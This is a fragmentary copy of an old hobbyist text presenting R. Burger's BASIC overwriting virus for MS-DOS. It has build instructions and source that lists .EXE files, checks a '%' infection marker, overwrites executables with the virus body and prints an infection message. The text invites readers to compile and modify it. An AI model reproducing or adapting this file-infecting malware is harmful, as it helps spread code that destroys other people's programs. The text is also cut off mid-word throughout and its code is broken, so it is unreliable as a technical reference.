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2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use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s great language and often people think of it as a limi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 of any use in creating something like a virus. We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rong. Lets take a look at a Basic Virus created by R. Burger in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overwritting virus and uses (Shell) MS-DOS to infect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To do this you must compile the source code using a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BASIC.Note the lenght of the compiled and the linked .EXE fil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place the lenght of the object program in the LENGH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BV3.EXE should be in the current directory, COMMAND.C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LENGHTVIR variable must be set to the lenght of the linke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member to use /e parameter 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REM ** DEM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** MODIFY IT YOUR OWN WAY IF DESIR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REM ** BASIC DOESNT S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REM ** NO K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N ERROR GOTO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REM *** LENGHTVIR MUST BE SE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REM *** TO THE LENGHT TO TH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REM *** LINKED PROGRA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NGHTVIR=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VIRROOT$="BV3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REM *** WRITE THE DIRECTORY IN THE FILE "INH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SHELL "DIR *.EXE&gt;INH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REM ** OPEN "INH" FILE AND READ NAM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OPEN "R",1,"INH",3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GET #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LINE INPUT#1,ORIGINAL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LINE INPUT#1,ORIGINAL$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LINE INPUT#1,ORIGINA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LINE INPUT#1,ORIGINAL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ON ERROR GOT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CLOSE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F=1:LINE INPUT#1,ORIGINAL$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REM ** "%" IS THE MARKER OF THE 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REM ** "%" IN THE NAM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 REM  ** INFECTED COPY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IF MID$(ORIGINAL$,1,1)="%" THEN GOTO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ORIGINAL$=MID$(ORIGINAL$,1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EXTENSIONS$=MID$(ORIGINAL,9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MID$(EXTENSIONS$,1,1)=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REM *** CONCATENATE NAMES INTO FILENAM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F=F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 IF MID$(ORIGINAL$,F,1)=" " OR MID$ (ORIGINAL$,F,1)="." OR F=13 T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GOTO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ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENS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ON ERROR GOTO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TEST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REM ++ OPEN FILE FOUND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OPEN "R",2,OROGINAL$,LENGH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IF LOF(2) &lt; LENGHTVIR THEN GOTO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GET #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LINE INPUT#1,TEST$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CLOSE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1 REM ++ CHECK IF PROGRAM IS ILL +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REM ++ "%" AT THE END OF THE FILE MEA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REM ++ FILE IS ALREADY SICK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REM IF MID$(TEST,2,1)="%" THEN GOTO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CLOSE#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ORIGINALS$=ORIGINAL$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MID$(ORIGINALS$,1,1)=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REM ++++ SANE "HEALTHY" PROGRAM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C$="COPY "+ORIGINAL$+" "+ORIGINALS$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SHELL C$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REM *** COPY VIRUS TO HEALTHY PROGRAM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C$="COPY "+VIRROOT$+ORIGINAL$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SHELL C$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 REM *** APPEND VIRUS MAR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OPEN ORIGINAL$ FOR APPEND AS #1 LEN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 WRITE#1,ORIGINALS$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CLOSE#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 REM ++ OUYPUT MESSAGE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PRINT "INFECTION IN " ;ORIGIANAL$; "  !! BE WARE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0 REM ** VIRUS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PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!"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ic virus will only attack .EXE files. After the execu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"INH" file which contains the directory, and the file %SO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start with "%" are NOT infected ,they pose as back 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